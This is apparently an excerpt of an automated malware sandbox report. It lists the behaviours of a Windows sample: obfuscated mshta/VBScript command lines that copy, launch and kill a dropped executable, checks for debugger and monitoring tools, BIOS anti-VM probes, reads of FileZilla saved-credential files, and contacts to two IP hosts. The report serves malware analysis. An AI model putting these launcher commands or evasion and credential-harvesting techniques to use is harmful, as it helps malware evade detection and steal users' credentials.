RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-0011-0000-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-0015-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-0016-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-0018-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-0019-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-001A-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-001B-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-001F-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-0028-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-002C-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-0044-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-006E-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-00A1-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {90140000-00BA-0412-0000-0000000FF1CE} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Sept. 19, 2021, 10:42 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000704 key_handle: 0x00000708 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Sept. 19, 2021, 10:43 a.m.	status_code: 0x00000001 process_identifier: 1148 process_handle: 0x000001c0		0	0
NtTerminateProcess Sept. 19, 2021, 10:43 a.m.	status_code: 0x00000001 process_identifier: 1148 process_handle: 0x000001c0	1	0	0

Uses Windows utilities for basic Windows functionality (11 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1580 CREDAT:145409
cmdline	MSHtA VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if ""/PCOd0LPl_yA""== """" for %j In (""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
cmdline	CmD.EXE /c CopY /y "C:\Users\test22\AppData\Local\Temp\vss.exe" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if ""=="" for %j In ("C:\Users\test22\AppData\Local\Temp\vss.exe" ) do taskkill /F -Im "%~Nxj"
cmdline	"C:\Windows\System32\cmd.exe" /c CopY /y "C:\Users\test22\AppData\Local\Temp\vss.exe" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if ""=="" for %j In ("C:\Users\test22\AppData\Local\Temp\vss.exe" ) do taskkill /F -Im "%~Nxj"
cmdline	"C:\Windows\System32\mshta.exe" VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\vss.exe"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if """"== """" for %j In (""C:\Users\test22\AppData\Local\Temp\vss.exe"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
cmdline	MSHtA VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\vss.exe"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if """"== """" for %j In (""C:\Users\test22\AppData\Local\Temp\vss.exe"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
cmdline	CmD.EXE /c CopY /y "C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if "/PCOd0LPl_yA"=="" for %j In ("C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" ) do taskkill /F -Im "%~Nxj"
cmdline	"C:\Windows\System32\cmd.exe" /c CopY /y "C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if "/PCOd0LPl_yA"=="" for %j In ("C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" ) do taskkill /F -Im "%~Nxj"
cmdline	taskkill /F -Im "vss.exe"
cmdline	"C:\Windows\System32\mshta.exe" VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if ""/PCOd0LPl_yA""== """" for %j In (""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome

Communicates with host for which no DNS query was performed (2 events)

host	117.18.232.200
host	79.174.13.108

Checks for the presence of known windows from debuggers and forensic tools (50 out of 122 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: File Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Process Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 19, 2021, 10:42 a.m.	class_name: Regmonclass window_name:		0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Sept. 19, 2021, 10:42 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Collects information about installed applications (50 out of 80 events)

Time & API	Arguments	Status
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: MarkAny Inc. e-PageSafer V2.5 NoAX ( Basic )_2.5.1.18 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ePageSafer\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: TouchEn nxKey with E2E for 32bit regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TouchEn nxKey\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: INISafeWeb 5.0 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: INISafeWeb 6.0 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb6\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Delfino G3 (x86) version 3.6.6.5 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1CBD185A-9CB3-4f30-B7E4-75CC551455F9}_is1\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: G2BRUN regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5BEFEB79-2B4D-4EEE-9979-AFDE0A20FADE}_is1\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: WIZVERA Process Manager 1,0,5,4 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{8941A397-4065-4F41-92CE-0EB610846EED}_is1\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
